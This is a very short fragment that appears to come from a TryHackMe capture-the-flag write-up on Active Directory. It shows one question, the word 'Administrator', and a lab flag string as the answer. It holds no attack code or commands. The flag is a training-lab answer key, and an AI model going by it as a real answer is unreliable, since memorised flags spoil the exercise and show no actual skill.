❓Question¶
Administrator
Answer
TryHackMe{4ctiveD1rectoryM4st3r}